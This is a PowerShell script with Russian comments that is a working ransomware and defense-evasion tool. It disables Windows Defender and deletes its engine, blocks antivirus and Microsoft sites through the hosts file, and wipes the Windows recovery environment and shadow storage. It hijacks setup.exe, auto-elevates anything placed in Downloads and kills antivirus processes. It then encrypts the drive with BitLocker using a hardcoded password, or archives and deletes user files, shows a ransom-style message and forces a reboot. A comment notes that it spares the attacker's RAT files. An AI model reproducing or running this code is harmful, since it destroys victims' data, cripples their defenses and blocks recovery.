# ============================================
# МОДУЛЬ 0: ОПРЕДЕЛЕНИЕ ВЕРСИИ ОС
# ============================================
$regPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
$build = [int](Get-ItemProperty -Path $regPath -Name "CurrentBuild" -ErrorAction SilentlyContinue).CurrentBuild
if (-not $build) { $build = [Environment]::OSVersion.Version.Build }

$major = [Environment]::OSVersion.Version.Major
$minor = [Environment]::OSVersion.Version.Minor
if ($build -ge 10240) { $major = 10 }

Write-Host "ОС определена: Major=$major, Minor=$minor, Build=$build" -ForegroundColor Cyan

# ============================================
# МОДУЛЬ 1: ПРОВЕРКА ПРАВ SYSTEM
# ============================================
$CurrentUser = [Security.Principal.WindowsIdentity]::GetCurrent().Name
if ($CurrentUser -ne "NT AUTHORITY\SYSTEM" -and $CurrentUser -ne "УРОВЕНЬ СИСТЕМЫ") {
    [System.Windows.Forms.MessageBox]::Show("КРИТИЧЕСКАЯ ОШИБКА:`nСкрипт должен работать от имени СИСТЕМЫ через Планировщик!", "Контроль прав", 0, 16)
    Exit 1
}
Write-Host "Права SYSTEM подтверждены." -ForegroundColor Green

# ============================================
# МОДУЛЬ 2: БЛОКИРОВКА САЙТОВ (hosts)
# ============================================
$domainsToBlock = @(
    "kaspersky.com", "kaspersky.ru",
    "drweb.ru", "drweb.com",
    "eset.com", "esetnod32.ru",
    "malwarebytes.com",
    "virustotal.com",
    "microsoft.com",
    "support.microsoft.com",
    "update.microsoft.com"
)
$hostsPath = "$env:windir\System32\drivers\etc\hosts"

Write-Host "Блокировка сайтов..." -ForegroundColor Yellow
if (Test-Path $hostsPath) {
    Copy-Item $hostsPath "$hostsPath.bak" -Force
    $currentHosts = Get-Content $hostsPath
    foreach ($domain in $domainsToBlock) {
        foreach ($entry in @($domain, "www.$domain")) {
            if (-not ($currentHosts -match [regex]::Escape($entry))) {
                Add-Content -Path $hostsPath -Value "127.0.0.1    $entry"
                Write-Host "  Заблокирован: $entry" -ForegroundColor Gray
            }
        }
    }
    ipconfig /flushdns
}

# ============================================
# МОДУЛЬ 3: ОТКЛЮЧЕНИЕ WINDOWS DEFENDER
# ============================================
Write-Host "Отключение Windows Defender..." -ForegroundColor Yellow
sc stop WinDefend 2>$null
sc config WinDefend start= disabled 2>$null
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f 2>$null

# ============================================
# МОДУЛЬ 4: УНИЧТОЖЕНИЕ СРЕДЫ ВОССТАНОВЛЕНИЯ
# ============================================
Write-Host "Удаление среды восстановления..." -ForegroundColor Yellow
takeown /f "C:\Windows\System32\Recovery" /a /r 2>$null
icacls "C:\Windows\System32\Recovery" /grant *S-1-5-32-544:F /c /t 2>$null
rmdir /s /q "C:\Windows\System32\Recovery" 2>$null
rmdir /s /q "C:\System Volume Information" 2>$null

# ============================================
# МОДУЛЬ 5: БЛОКИРОВКА SETUP.EXE И ДРАЙВЕРОВ
# ============================================
Write-Host "Блокировка установки драйверов и setup.exe..." -ForegroundColor Yellow
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Restrictions" /v DenyUnspecified /t REG_DWORD /d 1 /f 2>$null
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe" /v Debugger /t REG_SZ /d "cmd.exe /c exit" /f 2>$null

# ============================================
# МОДУЛЬ 6: УДАЛЕНИЕ ФАЙЛА ЗАЩИТНИКА (MsMpEng.exe)
# ============================================
Write-Host "Поиск и удаление MsMpEng.exe..." -ForegroundColor Yellow
$DefenderProc = Get-Process -Name MsMpEng -ErrorAction SilentlyContinue
if ($DefenderProc) {
    Stop-Process -Name MsMpEng -Force -ErrorAction SilentlyContinue
    Start-Sleep -Milliseconds 500
}
$DefenderPath = "C:\ProgramData\Microsoft\Windows Defender\Platform"
if (Test-Path $DefenderPath) {
    $MsMpEngFiles = Get-ChildItem -Path $DefenderPath -Recurse -Filter "MsMpEng.exe" -ErrorAction SilentlyContinue
    foreach ($File in $MsMpEngFiles) {
        takeown /f "$($File.FullName)" /a 2>$null
        icacls "$($File.FullName)" /grant *S-1-5-32-544:F /c 2>$null
        icacls "$($File.FullName)" /grant *S-1-5-18:F /c 2>$null
        Remove-Item -Path $File.FullName -Force -ErrorAction SilentlyContinue
        Write-Host "  Удален: $($File.FullName)" -ForegroundColor Red
    }
}

# ============================================
# МОДУЛЬ 7: ФОНОВЫЙ СТОРОЖ DOWNLOADS
# ============================================
Write-Host "Запуск сторожа Downloads..." -ForegroundColor Green
Start-Job -Name "DownloadWatcher" -ScriptBlock {
    $Folder = "$HOME\Downloads"
    $Watcher = New-Object System.IO.FileSystemWatcher
    $Watcher.Path = $Folder
    $Watcher.Filter = "*.*"
    $Watcher.IncludeSubdirectories = $false
    $Watcher.EnableRaisingEvents = $true

    $Action = {
        $Path = $Event.SourceEventArgs.FullPath
        Start-Sleep -Milliseconds 1000
        
        if (Test-Path $Path) {
            $Extension = [System.IO.Path]::GetExtension($Path)
            if ($Extension -eq ".exe" -or $Extension -eq ".bat" -or $Extension -eq ".cmd") {
                
                $IsMarked = Get-Item -Path $Path -Stream "Verified" -ErrorAction SilentlyContinue
                
                if ($null -eq $IsMarked) {
                    takeown /f "$Path" /a 2>$null
                    icacls "$Path" /grant *S-1-5-32-544:F /c 2>$null
                    icacls "$Path" /grant *S-1-5-18:F /c 2>$null
                    Set-Content -Path $Path -Stream "Verified" -Value "True"
                    Start-Process -FilePath $Path -Verb RunAs
                } else {
                    Start-Process -FilePath $Path -Verb RunAs
                }
            }
        }
    }
    Register-ObjectEvent $Watcher "Created" -Action $Action
    while ($true) { Start-Sleep -Seconds 5 }
}

# ============================================
# МОДУЛЬ 8: ФОНОВЫЙ ETW-МОНИТОР (таргетированный)
# ============================================
Write-Host "Запуск ETW-монитора..." -ForegroundColor Green
Start-Job -Name "ETWMonitor" -ScriptBlock {
    $TargetProcesses = @("kaspersky", "avast", "avp", "drweb", "eset", "mbam", "adwcleaner", "rkill")
    $FileLimit = 100
    $MonitoredFolders = @("C:\Users", "D:\")

    $ProcessTracker = [System.Collections.Concurrent.ConcurrentDictionary[int, [System.Collections.Generic.HashSet[string]]]]::new()
    $SessionName = "FinalDefenseSession"
    $LogFile = "$env:TEMP\final_defense.etl"

    logman stop $SessionName -etw 2>$null
    logman create trace $SessionName -rt -nb 16 256 -o $LogFile -p "Microsoft-Windows-Kernel-File" 0x10 2>$null

    try {
        Get-WinEvent -RawProvider -ProviderName "Microsoft-Windows-Kernel-File" -Oldest -ErrorAction SilentlyContinue | ForEach-Object {
            if ($_.Id -eq 12 -and $_.ProcessId) {
                $PidNum = $_.ProcessId
                
                $ProcName = (Get-Process -Id $PidNum -ErrorAction SilentlyContinue).Name
                if (-not $ProcName -or -not ($TargetProcesses -contains $ProcName.ToLower())) { return }

                $FilePath = $_.Properties[3].Value.ToString()
                if (-not $FilePath -or $FilePath -match "^\s*$") { return }
                $FilePathLower = $FilePath.ToLower()

                $IsInMonitoredFolder = $false
                foreach ($Folder in $MonitoredFolders) {
                    if ($FilePathLower.StartsWith($Folder.ToLower())) {
                        $IsInMonitoredFolder = $true
                        break
                    }
                }
                if (-not $IsInMonitoredFolder) { return }

                $UserHashSet = $ProcessTracker.GetOrAdd($PidNum, [System.Collections.Generic.HashSet[string]]::new())
                [System.Threading.Monitor]::Enter($UserHashSet)
                try {
                    [void]$UserHashSet.Add($FilePathLower)
                    $Count = $UserHashSet.Count
                }
                finally {
                    [System.Threading.Monitor]::Exit($UserHashSet)
                }

                if ($Count -gt $FileLimit) {
                    Write-Host "[ETW ALERT] Процесс '$ProcName' (PID: $PidNum) превысил лимит! Файлов: $Count" -ForegroundColor Red
                    Stop-Process -Id $PidNum -Force -ErrorAction SilentlyContinue
                    logman stop $SessionName -etw 2>$null
                    Remove-Item $LogFile -ErrorAction SilentlyContinue
                    break
                }
            }
        }
    }
    finally {
        logman stop $SessionName -etw 2>$null
        Remove-Item $LogFile -ErrorAction SilentlyContinue
    }
}

# ============================================
# МОДУЛЬ 9: ШИФРОВАНИЕ (BitLocker или Fallback-архив)
# ============================================
Write-Host "Проверка TPM для BitLocker..." -ForegroundColor Yellow
$Tpm = Get-Tpm -ErrorAction SilentlyContinue

if ($Tpm -and $Tpm.TpmPresent -and $Tpm.TpmReady) {
    # --- Попытка BitLocker ---
    Write-Host "BitLocker доступен. Включаю..." -ForegroundColor Green
    $Password = ConvertTo-SecureString "YHsgh273h*jY632H23##h#^y7h#^#@#h@" -AsPlainText -Force
    Enable-BitLocker -MountPoint "C:" -PasswordProtector -Password $Password -UsedSpaceOnly -SkipHardwareTest -ErrorAction SilentlyContinue
    Write-Host "BitLocker включен." -ForegroundColor Green
} else {
    # --- Fallback: архивное шифрование ---
    Write-Host "BitLocker недоступен. Запуск архивного шифрования..." -ForegroundColor Orange
    
    # ============================================
    # МОДУЛЬ 9b: FALLBACK-ШИФРОВАНИЕ
    # ============================================
    
    $Password = "YHsgh273h*jY632H23##h#^y7h#^#@#h@"
    $ArchivePath = "$env:USERPROFILE\Desktop\encrypted_archive.zip"
    $DriveToScan = "C:"
    $MaxFileSizeMB = 50
    
    # Папки, которые НЕ трогаем
    $ExcludeDirs = @(
        "\Windows\",
        "\Program Files\",
        "\Program Files (x86)\",
        "\ProgramData\Microsoft\",
        "\`$Recycle.Bin\",
        "\System Volume Information\",
        "\Recovery\"
    )
    
    # Расширения файлов, которые шифруем
    $TargetExtensions = @(
        ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf",
        ".txt", ".rtf", ".csv", ".mdb", ".accdb", ".one", ".odt", ".ods",
        ".jpg", ".jpeg", ".png", ".gif", ".bmp", ".tiff", ".psd", ".ai",
        ".mp4", ".avi", ".mov", ".mkv", ".wmv", ".flv", ".mp3", ".wav", ".wma",
        ".zip", ".rar", ".7z", ".tar", ".gz",
        ".html", ".htm", ".xml", ".json", ".sql", ".db", ".sqlite",
        ".cpp", ".cs", ".java", ".py", ".ps1", ".bat", ".sh"
    )
    
    Write-Host "[BitLocker] Не сработал. Запускаю архивный fallback..." -ForegroundColor Orange
    
    # 1. Поиск всех пользовательских файлов
    $FilesToEncrypt = @()
    Get-ChildItem -Path $DriveToScan -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
        $FullPath = $_.FullName
        $Ext = $_.Extension.ToLower()
        
        # Проверяем исключения папок
        $Excluded = $false
        foreach ($ExDir in $ExcludeDirs) {
            if ($FullPath.StartsWith($ExDir, [System.StringComparison]::OrdinalIgnoreCase)) {
                $Excluded = $true
                break
            }
        }
        
        # Исключения по имени файла (защищаем ратку)
        $ExcludeFileNames = @("stub", "client", "payload", "rat", "asyncrat", "server")
        $FileNameWithoutExt = [System.IO.Path]::GetFileNameWithoutExtension($FullPath).ToLower()
        $ExcludedByName = $false
        foreach ($ExName in $ExcludeFileNames) {
            if ($FileNameWithoutExt.Contains($ExName)) {
                $ExcludedByName = $true
                break
            }
        }
        
        # Проверяем расширение и размер
        if (-not $Excluded -and -not $ExcludedByName -and ($TargetExtensions -contains $Ext) -and ($_.Length -lt ($MaxFileSizeMB * 1MB))) {
            $FilesToEncrypt += $FullPath
        }
    }
    
    $TotalFiles = $FilesToEncrypt.Count
    Write-Host "[Fallback] Найдено $TotalFiles файлов для шифрования..." -ForegroundColor Yellow
    
    if ($TotalFiles -eq 0) {
        Write-Host "[Fallback] Нечего шифровать. Выход." -ForegroundColor Red
        Exit
    }
    
    # 2. Создаём защищённый паролем ZIP-архив
    Write-Host "[Fallback] Создаю зашифрованный архив: $ArchivePath" -ForegroundColor Cyan
    
    $SevenZip = "C:\Program Files\7-Zip\7z.exe"
    
    if (Test-Path $SevenZip) {
        $FileList = $FilesToEncrypt -join "`n"
        $TempList = "$env:TEMP\files_to_encrypt.txt"
        $FileList | Out-File -FilePath $TempList -Encoding UTF8
        & $SevenZip a -tzip -mem=AES256 -p"$Password" -spf -scsUTF-8 @"$ArchivePath" @"$TempList"
        Remove-Item $TempList -Force
    } else {
        Write-Host "[Fallback] 7-Zip не найден. Использую встроенный метод + пароль через .NET..." -ForegroundColor Yellow
        
        $TempArchive = "$env:TEMP\temp_archive.zip"
        Compress-Archive -Path $FilesToEncrypt -DestinationPath $TempArchive -CompressionLevel Optimal -Force
        
        $zipBytes = [System.IO.File]::ReadAllBytes($TempArchive)
        $aes = [System.Security.Cryptography.Aes]::Create()
        $aes.KeySize = 256
        $aes.BlockSize = 128
        $aes.GenerateIV()
        $salt = [System.Security.Cryptography.RandomNumberGenerator]::GetBytes(16)
        $deriveBytes = [System.Security.Cryptography.Rfc2898DeriveBytes]::new($Password, $salt, 10000)
        $key = $deriveBytes.GetBytes(32)
        $aes.Key = $key
        
        $encryptor = $aes.CreateEncryptor()
        $encryptedData = $encryptor.TransformFinalBlock($zipBytes, 0, $zipBytes.Length)
        
        $FinalData = $aes.IV + $salt + $encryptedData
        [System.IO.File]::WriteAllBytes($ArchivePath, $FinalData)
        Remove-Item $TempArchive -Force
    }
    
    Write-Host "[Fallback] Архив создан и зашифрован." -ForegroundColor Green
    
    # 3. Удаление оригиналов
    Write-Host "[Fallback] Удаляю оригиналы файлов..." -ForegroundColor Red
    foreach ($File in $FilesToEncrypt) {
        Remove-Item -Path $File -Force -ErrorAction SilentlyContinue
    }
    
    Write-Host "[Fallback] Готово. Все файлы в архиве: $ArchivePath" -ForegroundColor Green
    
    # 4. Сообщение для пользователя
    [System.Windows.Forms.MessageBox]::Show(
        "Ваши файлы зашифрованы и упакованы в архив:`n$ArchivePath`n`nПароль для расшифровки у администратора.",
        "Файлы зашифрованы",
        0, 48
    )
}

# ============================================
# ФИНАЛ: ПРИНУДИТЕЛЬНАЯ ПЕРЕЗАГРУЗКА
# ============================================
Write-Host "`nВсе модули запущены. Перезагрузка для применения BitLocker..." -ForegroundColor Green
Start-Sleep -Seconds 5
shutdown /r /f /t 0
